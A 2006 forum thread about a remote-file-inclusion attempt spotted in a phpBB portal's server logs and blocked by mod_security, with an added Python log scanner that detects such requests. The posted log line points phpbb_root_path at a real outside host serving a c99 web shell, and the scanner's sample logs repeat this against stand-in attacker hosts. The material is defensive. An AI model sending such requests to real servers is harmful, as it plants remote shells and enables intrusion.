Hacking Attempt?

Posted: Tue Sep 12, 2006 7:53 pm
Author: Bush
I saw this in the logs of my dedicated Linux server for my site.

GET /portal///includes/functions_portal.php?phpbb_root_path=http://www.festivalrilke.ch/files/upload/c99shellb16.txt?&cmd=id HTTP/1.1

If you click the URL within the GET command you'll see an elaborate script that is trying to be executed. Thank god I have mod_security installed and it was able to block/deny the phpbb_root_path command from being executed.

Posted: Wed Sep 13, 2006 1:15 pm
Author: Michaelo
It denies the GET command and not the php_root_path...
The current security updates prevent this...

Posted: Wed Sep 13, 2006 4:36 pm
Author: computerz
Michaelo wrote:
It denies the GET command and not the php_root_path...
The current security updates prevent this...

It will deny the phpbb_root_path element if it is specified in the filters. I made a post on this below. I also have similar exploit attempts in my logs and they're not using a GET statement, but they're still getting blocked because the phpbb_root_path parameter is being filtered in my rule set.
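
The point made in the post above, that a filter keyed on the phpbb_root_path parameter catches the request whatever HTTP method carries it, as an added example (not code from any poster and not mod_security's own logic): a scan of access-log lines that flags requests whose phpbb_root_path value is a remote URL. The log entries, hosts and the function name are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request line of an Apache access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"([A-Z]+) (\S+) HTTP/[\d.]+"')
# A value that would make a PHP include fetch code from another host.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
WATCHED = {"phpbb_root_path"}  # parameter named in the thread

# Constructed sample entries (hosts, times and sizes are made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2006:19:40:01 +0000] "GET /portal/includes/'
    'functions_portal.php?phpbb_root_path=http://attacker.example/shell.txt?'
    '&cmd=id HTTP/1.1" 403 202',
    '203.0.113.9 - - [12/Sep/2006:19:41:10 +0000] "POST /portal/includes/'
    'functions_portal.php?phpbb_root_path=http%3A%2F%2Fattacker.example'
    '%2Fshell.txt%3F HTTP/1.1" 403 202',
    '198.51.100.4 - - [12/Sep/2006:19:42:00 +0000] '
    '"GET /portal/index.php?phpbb_root_path=./ HTTP/1.1" 200 5120',
    '198.51.100.4 - - [12/Sep/2006:19:42:05 +0000] '
    '"GET /portal/viewtopic.php?t=42 HTTP/1.1" 200 8841',
]

def remote_include_attempts(lines, watched=WATCHED):
    """Return (method, path, remote_host) for each flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        method, target = m.groups()  # the method is reported, never filtered on
        try:
            parts = urlsplit(target)
            # parse_qsl percent-decodes, so http%3A%2F%2F is seen as http://
            for name, value in parse_qsl(parts.query, keep_blank_values=True):
                if name.lower() in watched and REMOTE_RE.match(value):
                    host = urlsplit(value).hostname
                    hits.append((method, parts.path, host))
                    break
        except ValueError:  # malformed URL in the target or the value
            continue
    return hits

if __name__ == "__main__":
    for hit in remote_include_attempts(SAMPLE_LOG):
        print(*hit)
```

An access log only records the query string, so a phpbb_root_path value sent in a POST body would not appear here; that case needs a filter that inspects the request body.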

Posted: Thu Sep 14, 2006 4:33 am
Author: Michaelo
Must be updates since the breach...